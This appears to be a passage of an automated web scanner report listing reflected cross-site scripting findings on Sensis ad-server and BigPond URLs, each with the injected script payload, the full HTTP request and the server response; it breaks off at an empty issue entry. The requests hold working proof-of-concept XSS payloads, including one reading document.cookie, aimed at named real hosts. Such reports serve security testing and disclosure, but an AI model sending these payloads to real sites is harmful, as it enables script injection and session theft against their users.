GET /hserver/acc_random86e0a"><script>alert(1)</script>28f9b0d0f51=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:38 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.706. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcbab"><script>alert(1)</script>4a82df0e73e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?bcbab"><script>alert(1)</script>4a82df0e73e=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 514 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc735"><script>alert(1)</script>28006cbe02a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hservercc735"><script>alert(1)</script>28006cbe02a/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc78"><script>alert(1)</script>bfdd67836dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomdfc78"><script>alert(1)</script>bfdd67836dd=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:37 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.709. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9250f"><script>alert(1)</script>3fc0eaf9429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?9250f"><script>alert(1)</script>3fc0eaf9429=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:35 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 514 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ead0a'-alert(1)-'daa7534d726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserveread0a'-alert(1)-'daa7534d726/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:11:58 GMT X-DirectServer: DS5 Content-Type: application/x-javascript Content-Length: 1649 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec18a'-alert(1)-'929f14a4b1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver/acc_randomec18a'-alert(1)-'929f14a4b1a=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:05 GMT X-DirectServer: DS3 Content-Type: application/x-javascript Content-Length: 1539 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.712. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbfd3'-alert(1)-'e30cf483b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415?fbfd3'-alert(1)-'e30cf483b0c=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:11:51 GMT X-DirectServer: DS3 Content-Type: application/x-javascript Content-Length: 1658 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116e7'-alert(1)-'c801336c73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver116e7'-alert(1)-'c801336c73d/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:11:54 GMT X-DirectServer: DS5 Content-Type: application/x-javascript Content-Length: 1649 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4e94'-alert(1)-'912c3b5c3b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver/acc_randomc4e94'-alert(1)-'912c3b5c3b9=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:01 GMT X-DirectServer: DS1 Content-Type: application/x-javascript Content-Length: 1589 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.715. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e52'-alert(1)-'9e3ac9feb9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415?b5e52'-alert(1)-'9e3ac9feb9c=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:11:47 GMT X-DirectServer: DS2 Content-Type: application/x-javascript Content-Length: 1658 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb696'-alert(1)-'1030d1f6ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserverfb696'-alert(1)-'1030d1f6ae2/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5; LE1=wyowC1+4mX6+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:29 GMT X-DirectServer: DS1 Content-Type: application/x-javascript Content-Length: 1850 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e858'-alert(1)-'c78a48c661c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver/acc_random7e858'-alert(1)-'c78a48c661c=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5; LE1=wyowC1+4mX6+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS3 Content-Type: application/x-javascript Content-Length: 1814 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.718. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3faea'-alert(1)-'a3a4f4e6edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373?3faea'-alert(1)-'a3a4f4e6edd=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5; LE1=wyowC1+4mX6+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:22 GMT X-DirectServer: DS1 Content-Type: application/x-javascript Content-Length: 1865 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68b33<script>alert(1)</script>b13de12fc76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common68b33<script>alert(1)</script>b13de12fc76/main.tfo HTTP/1.1 Host: www.bigpondoffice.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Invalid path /common68b33<script>alert(1)</script>b13de12fc76/main was requested Date: Tue, 23 Nov 2010 02:54:45 GMT Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.25 P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD AI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI' Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 2460
2.720. http://www.gamearena.com.au/news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.gamearena.com.au
Path:
/news/
Issue detail
